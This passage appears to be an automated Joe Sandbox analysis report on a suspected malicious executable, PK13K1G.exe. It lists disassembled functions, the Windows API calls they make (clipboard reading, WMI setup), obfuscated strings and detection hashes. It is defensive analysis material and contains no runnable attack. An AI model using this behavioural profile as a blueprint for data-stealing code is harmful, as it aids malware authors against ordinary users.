WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?), ref: 0002FD48

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a1f27615ce713286d09159116959e50842ae6dad6e12f55abb5c968d38dbd714
Instruction ID: 7fb5b687f5bf5c210566959275700a7ffe0851ea5c14deb9882dc94e104a50e2
Opcode Fuzzy Hash: a1f27615ce713286d09159116959e50842ae6dad6e12f55abb5c968d38dbd714
Instruction Fuzzy Hash: A9F03736500226BFDF531F91EC08A9A3F7BFB097E1B418470FA0985130DA3298609B91

Function 00024F01 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00024F13
GetCurrentThreadId.KERNEL32 ref: 00024F22
GetCurrentProcessId.KERNEL32 ref: 00024F2B
QueryPerformanceCounter.KERNEL32(?), ref: 00024F38

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: cde9f9fa6dc10d2d5f37245b528291be7da13ed05d5975e638a5317793e5ef89
Instruction ID: d9341af45ec3da5bc707ab0f180603714af56479ec77f1463bfae48e3cea246b
Opcode Fuzzy Hash: cde9f9fa6dc10d2d5f37245b528291be7da13ed05d5975e638a5317793e5ef89
Instruction Fuzzy Hash: E4F0B234C0020CEBDB45DBB4CA88A8EBBF8FF1C204B918995E412E7110EB34AB489F50

Function 00028BFD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00028AFE,?,?,00000000,00000000,00000000,?), ref: 00028C22

Strings

RCC, xrefs: 00028C3C
MOC, xrefs: 00028C34

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 3713000b0ab07c0cd9c81959dcbfc97c0571e2824a73973bb2f8902abc2501eb
Instruction ID: 9b1d4216aeb655e64cdee1450c4f65ed3d191d90764fcd0bcc7ad2c93ae2a2ba
Opcode Fuzzy Hash: 3713000b0ab07c0cd9c81959dcbfc97c0571e2824a73973bb2f8902abc2501eb
Instruction Fuzzy Hash: 1D41AC75901229EFCF16DF94ED81AEEBBB5FF48300F288169F908A7252D7359950CB50

Function 00028469 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 000286E0

Strings

csm, xrefs: 00028702
csm, xrefs: 00028773

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: deeb9db8472cdeb0e9f9ad70e347dc14fc5312916d6f6c8ba62e70ef94efddb2
Instruction ID: c47ab671a9d238ba7db9b85c68195acabd5f2de7ea58071db45e3c0657eb5c36
Opcode Fuzzy Hash: deeb9db8472cdeb0e9f9ad70e347dc14fc5312916d6f6c8ba62e70ef94efddb2
Instruction Fuzzy Hash: FB31E73E40A239DBCF668F50EC449AABBA6FF08315B38C559FC5449221DB32CC61DB91

Analysis Process: PK13K1G.exePID: 2056, Parent PID: 3864COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.7%
Total number of Nodes:	44
Total number of Limit Nodes:	4

Executed Functions

Function 004087F0 Relevance: 7.6, APIs: 5, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408814
GetCurrentThreadId.KERNEL32 ref: 0040881E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088C3
GetForegroundWindow.USER32 ref: 004088EA

Part of subcall function 0040CC30: CoInitializeEx.OLE32(00000000,00000002), ref: 0040CC43

ExitProcess.KERNEL32 ref: 004089A5

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3701390975-0
Opcode ID: 41b42d328a19db912d5f42013fc4ea16b02f5e4ca1e6530b9d21cc216a0ee564
Instruction ID: 2234002321661bf3830049ecc05d716bf8d1a9e635a00dab917db628975ef54e
Opcode Fuzzy Hash: 41b42d328a19db912d5f42013fc4ea16b02f5e4ca1e6530b9d21cc216a0ee564
Instruction Fuzzy Hash: 9F418873B5070807D7187AB98D9A3A9B58B5BC4314F0E843E6AC69B3E1FDFC8C4A4184

Function 0040B71E Relevance: 2.7, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@rBt, xrefs: 0040BABF
iJsL, xrefs: 0040BA39

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: @rBt$iJsL
API String ID: 0-3788747798
Opcode ID: 25cc464105360d439745194dc9ae8b60584eb89a6ba6157b52b8cef2fcf44540
Instruction ID: a6398e18f1d65d56a489b67a255dd93b19a44f3958bb85bb2d47f2f98d107459
Opcode Fuzzy Hash: 25cc464105360d439745194dc9ae8b60584eb89a6ba6157b52b8cef2fcf44540
Instruction Fuzzy Hash: DCB12DB1511300CFE715DFAA8A89FA57FA1FB01210F5A92E9C4582F336C7718886CF96

Function 0043A1E0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043C75B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A20E

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040B2AE Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690fb0644db62dbc83e46c368ee3cfd203823ac6362a7d0eab255857f194a20a
Instruction ID: 63937f7f04bd90684fd23702f5ad218b5f452730d851f41bff8ee355e01dfade
Opcode Fuzzy Hash: 690fb0644db62dbc83e46c368ee3cfd203823ac6362a7d0eab255857f194a20a
Instruction Fuzzy Hash: 16C16D79604B01CFD328CF29DC61A27B7F2FB89320F158A2DE496877A1D734E8158B54

Function 004336E1 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00433706

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 833c25c747303cf0fb889ad5cb20616578c82d527b1be76cd43db15c2721b19b
Instruction ID: 2fa3baf30a8cc16dae3e48d72460621a4ad9e8051382687841e25b4bbb627110
Opcode Fuzzy Hash: 833c25c747303cf0fb889ad5cb20616578c82d527b1be76cd43db15c2721b19b
Instruction Fuzzy Hash: 8F113A76A046918FCB158F38889438AFBA1AB5A214F05C3BCD89A97395C7356909CB90

Function 00438770 Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,?,004124A8), ref: 0043878E

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 863558e51cd35052556122477ab037ae5ff7573c945e266a4a4654eee424fa66
Instruction ID: e4ca2682b691cfcd20076fbc39ca68638fe5167f953fc562f88896ce36329ca1
Opcode Fuzzy Hash: 863558e51cd35052556122477ab037ae5ff7573c945e266a4a4654eee424fa66
Instruction Fuzzy Hash: 3BD0C735549526DBD6101F14FC0579A3698DF0E752F034471E9045A072C775DC509AD8

Function 00438747 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043874C

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c25e97eff2803826bbe53d0895f3a668c16e6e44a2ac319fa90c1cd0b3b1e682
Instruction ID: ee01b1baed68e98b9ee82d354977801ae3f0b3dbaefeac7df8ad4fc8c602b13a
Opcode Fuzzy Hash: c25e97eff2803826bbe53d0895f3a668c16e6e44a2ac319fa90c1cd0b3b1e682
Instruction Fuzzy Hash: EFA001391852109ADA552B24BC09B88BA25EB58712F1240A1A101590BA8661A8929A88

Non-executed Functions

Function 00430A83 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 176memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00430B36

Strings

C, xrefs: 00430B6D
!, xrefs: 00430BF4
Z, xrefs: 00430C17
T, xrefs: 00430BEF
0, xrefs: 00430B9F
T, xrefs: 00430BA9
:, xrefs: 00430BD1
$, xrefs: 00430B95
r, xrefs: 00430C03
Y, xrefs: 00430BBD
%, xrefs: 00430C08
C, xrefs: 00430C5D
<, xrefs: 00430C8D
H, xrefs: 00430B63
#, xrefs: 00430BFE
9, xrefs: 00430C75
U, xrefs: 00430BC7
^, xrefs: 00430B81
;, xrefs: 00430C85
), xrefs: 00430C1C
', xrefs: 00430C12
=, xrefs: 00430C95
0, xrefs: 00430D53
_, xrefs: 00430C2B
K, xrefs: 00430B77
1, xrefs: 00430C44
], xrefs: 00430BDB
P, xrefs: 00430C53
5, xrefs: 00430C58
K, xrefs: 00430BF9
[, xrefs: 00430C6D
p, xrefs: 00430BE5
-, xrefs: 00430C30
O, xrefs: 00430C0D
~, xrefs: 00430C35
B, xrefs: 00430C3F
S, xrefs: 00430B4F
/, xrefs: 00430C3A
G, xrefs: 00430B59
+, xrefs: 00430C26
7, xrefs: 00430C65
3, xrefs: 00430C4E
N, xrefs: 00430C7D
,, xrefs: 00430B8B
], xrefs: 00430C49
_, xrefs: 00430C21
F, xrefs: 00430BB3

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: AllocString
String ID: !$#$$$%$'$)$+$,$-$/$0$0$1$3$5$7$9$:$;$<$=$B$C$C$F$G$H$K$K$N$O$P$S$T$T$U$Y$Z$[$]$]$^$_$_$p$r$~
API String ID: 2525500382-936980522
Opcode ID: 775fcc1d82b22aa6976c0dd8c0ed63d8a21e3d2ae9d9648403e2c1f48b8f674a
Instruction ID: 97fd74956ea73e1bca67cc193e0afd49e0ca59fd5e3d48c49bec5032652d235f
Opcode Fuzzy Hash: 775fcc1d82b22aa6976c0dd8c0ed63d8a21e3d2ae9d9648403e2c1f48b8f674a
Instruction Fuzzy Hash: 4291272050CBC1CEE326C678845975FBFD15BE6308F18899DE1E99B392C6BE8509C727

Function 0042F7B2 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042F856

Strings

$, xrefs: 0042F8B5
T, xrefs: 0042F8C9
Z, xrefs: 0042F937
C, xrefs: 0042F97D
<, xrefs: 0042F9AD
F, xrefs: 0042F8D3
#, xrefs: 0042F91E
:, xrefs: 0042F8F1
O, xrefs: 0042F92D
], xrefs: 0042F969
;, xrefs: 0042F9A5
/, xrefs: 0042F95A
N, xrefs: 0042F99D
+, xrefs: 0042F946
_, xrefs: 0042F94B
G, xrefs: 0042F879
3, xrefs: 0042F96E
], xrefs: 0042F8FB
S, xrefs: 0042F86F
0, xrefs: 0042F8BF
^, xrefs: 0042F8A1
r, xrefs: 0042F923
9, xrefs: 0042F995
H, xrefs: 0042F883
', xrefs: 0042F932
_, xrefs: 0042F941
%, xrefs: 0042F928
[, xrefs: 0042F98D
P, xrefs: 0042F973
1, xrefs: 0042F964
K, xrefs: 0042F897
=, xrefs: 0042F9B5
), xrefs: 0042F93C
B, xrefs: 0042F95F
5, xrefs: 0042F978
K, xrefs: 0042F919
T, xrefs: 0042F90F
!, xrefs: 0042F914
-, xrefs: 0042F950
Y, xrefs: 0042F8DD
C, xrefs: 0042F88D
,, xrefs: 0042F8AB
0, xrefs: 0042FA75
p, xrefs: 0042F905
U, xrefs: 0042F8E7
~, xrefs: 0042F955
7, xrefs: 0042F985

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: AllocString
String ID: !$#$$$%$'$)$+$,$-$/$0$0$1$3$5$7$9$:$;$<$=$B$C$C$F$G$H$K$K$N$O$P$S$T$T$U$Y$Z$[$]$]$^$_$_$p$r$~
API String ID: 2525500382-936980522
Opcode ID: f54567b1230b4cf65728313eb417c0ef0c7d839f464acea92e7868affd8e26c9
Instruction ID: 59d03bf4dce85c01bcc01451ad342941574c06aa5da8ee912d71ee97c1f2c872
Opcode Fuzzy Hash: f54567b1230b4cf65728313eb417c0ef0c7d839f464acea92e7868affd8e26c9
Instruction Fuzzy Hash: FE91482150CBC0C9E326C678845835FFFD11BE6308F1889ADE5E95B392C3BA8549C767

Function 004198A0 Relevance: 53.9, Strings: 42, Instructions: 1414COMMON

Download Yara Rule

Strings

nGy, xrefs: 00419E32
rGy, xrefs: 004199E8
nGy, xrefs: 004199B1
rGy, xrefs: 0041A298
nGy, xrefs: 0041A267
nGy, xrefs: 0041A79D
rGy, xrefs: 0041A438
A2J4, xrefs: 00419C4C
_P, xrefs: 00419D6B
rGy, xrefs: 00419FA8
nGy, xrefs: 0041A5B4
rGy, xrefs: 00419DE8
rGy, xrefs: 00419A88
nGy, xrefs: 0041A859
nGy, xrefs: 00419B5B
nGy, xrefs: 00419F6C
1N3@, xrefs: 00419C64
K>^0, xrefs: 00419C44
rGy, xrefs: 0041A068
rGy, xrefs: 00419F18
nGy, xrefs: 00419EEB
X:_<, xrefs: 00419CD2, 00419CDD, 00419D9B
wJ/L, xrefs: 00419C5C
rGy, xrefs: 0041A517
rGy, xrefs: 00419E68
AB, xrefs: 00419C6C
I,~M, xrefs: 0041A7E7
nGy, xrefs: 0041A035
nGy, xrefs: 0041A405
rGy, xrefs: 0041A5E1
rGy, xrefs: 0041A7CA
rGy, xrefs: 0041A198
nGy, xrefs: 00419A53
nGy, xrefs: 004198C1
nGy, xrefs: 00419DB3
nGy, xrefs: 0041A305
rGy, xrefs: 0041A338
rGy, xrefs: 0041A888
rGy, xrefs: 00419B88
nGy, xrefs: 0041A4EA
nGy, xrefs: 0041A167
rGy, xrefs: 004198F8

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: 1N3@$A2J4$AB$I,~M$K>^0$X:_<$_P$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$nGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$rGy$wJ/L
API String ID: 2994545307-2362962534
Opcode ID: f07ea9933575974f2ac13ac83d0d488730c047864596e2cac0784d41cb324529
Instruction ID: 97557fb9f8f5d5ca30c946343eba6c3ab8aa83f7906715defc6fed8d713afce0
Opcode Fuzzy Hash: f07ea9933575974f2ac13ac83d0d488730c047864596e2cac0784d41cb324529
Instruction Fuzzy Hash: AB923575A493409BD724CB24CC90BAFBBE3EBD6700F28852DE4C587355DA79DC818B4A

Function 00435A80 Relevance: 26.8, APIs: 10, Strings: 5, Instructions: 591memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435C5D
SysAllocString.OLEAUT32(551B5320), ref: 00435CDF
CoSetProxyBlanket.OLE32(DAB1E9F3,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435D21
SysAllocString.OLEAUT32(64B262B6), ref: 00435D8E
SysAllocString.OLEAUT32(38E226F6), ref: 00435E30
VariantInit.OLEAUT32(}fgx), ref: 00435EA0
VariantClear.OLEAUT32(?), ref: 0043601E
SysFreeString.OLEAUT32(?), ref: 00436046
SysFreeString.OLEAUT32(?), ref: 0043604C

Strings

FG, xrefs: 00435C96
:, xrefs: 00435BDC
|0, xrefs: 00435B87
BC, xrefs: 00435EDA
}fgx, xrefs: 00435AA5

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
String ID: :$BC$FG$|0$}fgx
API String ID: 3490847348-3928956760
Opcode ID: c335382f9809c6f7e8469417d9d0bc63935e43618406658561c94e1eca5b370b
Instruction ID: a76f13e6ea60da28090c9d6f6efff98c8f843114155e4f869dc388d1b3162286
Opcode Fuzzy Hash: c335382f9809c6f7e8469417d9d0bc63935e43618406658561c94e1eca5b370b
Instruction Fuzzy Hash: CC121F716083419FD310CF64C881B6BBBE1EFC9314F24982EF6958B3A1D6B9D846CB56

Function 00419364 Relevance: 24.1, Strings: 19, Instructions: 310COMMON

Download Yara Rule

Strings

T1]3, xrefs: 00419458
I=L?, xrefs: 00419479
A, xrefs: 00419676
B%R', xrefs: 00419437
E-@/, xrefs: 0041944D
2A'C, xrefs: 00419484
t)}+, xrefs: 00419442
lm, xrefs: 004194FD
9Q=S, xrefs: 004194B0
5]0_, xrefs: 004194D1
>M=O, xrefs: 004194A5
*E2G, xrefs: 0041948F
Y4[, xrefs: 004194C6
S!M#, xrefs: 0041942C
C5E7, xrefs: 00419463
RYj, xrefs: 00419507
d9y;, xrefs: 0041946E
nSYj, xrefs: 00419533
:UW, xrefs: 004194BB

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: Y4[$*E2G$2A'C$5]0_$9Q=S$:UW$>M=O$A$B%R'$C5E7$E-@/$I=L?$S!M#$T1]3$d9y;$lm$nSYj$t)}+$RYj
API String ID: 0-946903365
Opcode ID: 50a9607d097c7dc2526f36476c31d7efb3d31ba00646a6d3ee99c93cf8956a68
Instruction ID: 5d3af7c6b2e1f44baca3dbfe8835aaaf9801849016c575238b796eaf9870c80d
Opcode Fuzzy Hash: 50a9607d097c7dc2526f36476c31d7efb3d31ba00646a6d3ee99c93cf8956a68
Instruction Fuzzy Hash: BEB1A8B55093818BC335CF25C4A13EBBBF5AF85354F14892DD4D98B380E7788A85CB4A

Function 004158DC Relevance: 23.6, Strings: 18, Instructions: 1102COMMON

Download Yara Rule

Strings

rGy, xrefs: 00415678
rGy, xrefs: 00416758
hj, xrefs: 00415F44
tv, xrefs: 00415F39
H, xrefs: 00417733
rGy, xrefs: 00415938
nGy, xrefs: 0041563D
|~, xrefs: 00415F23
o`, xrefs: 00415F5A
N, xrefs: 0041773B
rGy, xrefs: 00416508
rk5m, xrefs: 00417954
nGy, xrefs: 004164CC
r, xrefs: 004165CA
nGy, xrefs: 004158FD
VjA, xrefs: 00416A50
D, xrefs: 00415E06
nGy, xrefs: 00416727

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: D$H$N$VjA$nGy$nGy$nGy$nGy$o`$r$rk5m$rGy$rGy$rGy$rGy$hj$tv$|~
API String ID: 2994545307-245973945
Opcode ID: b6b0aee34d9461441e64b6feca72c373e5f4cbc3d89cdcae1170ed84ab6934dc
Instruction ID: 672c62a6ac4fb5ae76ee983b27debc59733b40eb115d6591d660cfac9bdfde3a
Opcode Fuzzy Hash: b6b0aee34d9461441e64b6feca72c373e5f4cbc3d89cdcae1170ed84ab6934dc
Instruction Fuzzy Hash: 6972ADB0508380CBD3248F24C8517ABBBE1FFD6314F198A6ED4C95B391E7798945CB9A

Function 004152BB Relevance: 18.3, Strings: 14, Instructions: 820COMMON

Download Yara Rule

Strings

rGy, xrefs: 00415678
l`nO, xrefs: 0041555A
rGy, xrefs: 00416758
rGy, xrefs: 00415378
H, xrefs: 00417733
nGy, xrefs: 0041563D
N, xrefs: 0041773B
rGy, xrefs: 00416508
rk5m, xrefs: 00417954
nGy, xrefs: 004164CC
r, xrefs: 004165CA
VjA, xrefs: 00416A50
nGy, xrefs: 00416727
nGy, xrefs: 0041533E

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: H$N$VjA$l`nO$nGy$nGy$nGy$nGy$r$rk5m$rGy$rGy$rGy$rGy
API String ID: 0-1324649891
Opcode ID: 987de623bcd732a1846590daf4be063a94d8a7c62827861bf08a06ed7801fa18
Instruction ID: 2c78edb4785900e02af482e748ee47a7c889e89780aee4426d746b634bd50f27
Opcode Fuzzy Hash: 987de623bcd732a1846590daf4be063a94d8a7c62827861bf08a06ed7801fa18
Instruction Fuzzy Hash: 3F320375508380CBD7288F24D8506EFBBE2EFD6304F184A6EE4D687391DB389945CB5A

Function 00430FD0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 124clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430FE0
GetWindowLongW.USER32 ref: 00431005
GetClipboardData.USER32 ref: 00431015
GlobalLock.KERNEL32 ref: 00431034
GlobalUnlock.KERNEL32 ref: 00431154
CloseClipboard.USER32 ref: 0043115D

Strings

n, xrefs: 0043108F
P, xrefs: 004310B2
(, xrefs: 004310BC
j, xrefs: 0043108A

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$j$n
API String ID: 2832541153-4108516104
Opcode ID: 376ec1aba5fec8f80709e5a93fe37f22cf2dd6f086e3b2f305ae32fdd1fc15e8
Instruction ID: 1cf71816257602f6d5a0cefa4a809eae056d91dfa73ba62816c53589908da19d
Opcode Fuzzy Hash: 376ec1aba5fec8f80709e5a93fe37f22cf2dd6f086e3b2f305ae32fdd1fc15e8
Instruction Fuzzy Hash: CD41A27160C3818EE300AF78D98835FBFE09B89304F14593EE5DA87292D6BD854C9757

Function 00409300 Relevance: 12.9, Strings: 10, Instructions: 405COMMON

Download Yara Rule

Strings

djfo, xrefs: 004093E4
ah`{, xrefs: 00409340
jjdo, xrefs: 004093DC
|hic, xrefs: 00409338
, xrefs: 00409644, 004096CE
c_YD, xrefs: 004093B4
W6, xrefs: 00409434
jdjU, xrefs: 004093F4
Txrf, xrefs: 00409328
$', xrefs: 0040947E

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: $'$Txrf$W6$ah`{$c_YD$djfo$jdjU$jjdo$|hic$
API String ID: 0-3580404784
Opcode ID: ccd7709c885fdfc3963d0bf7db32e06b56d65686e4665976dd46a3ad4080cb5c
Instruction ID: 7f85938ad554b64ca8b78e43467904bcde699530799641efd8494165b3d1572a
Opcode Fuzzy Hash: ccd7709c885fdfc3963d0bf7db32e06b56d65686e4665976dd46a3ad4080cb5c
Instruction Fuzzy Hash: 98B1E57160C3819BC3168F3A849076BFFE19FD3344F48596DE4D55B382D239890AC7AA

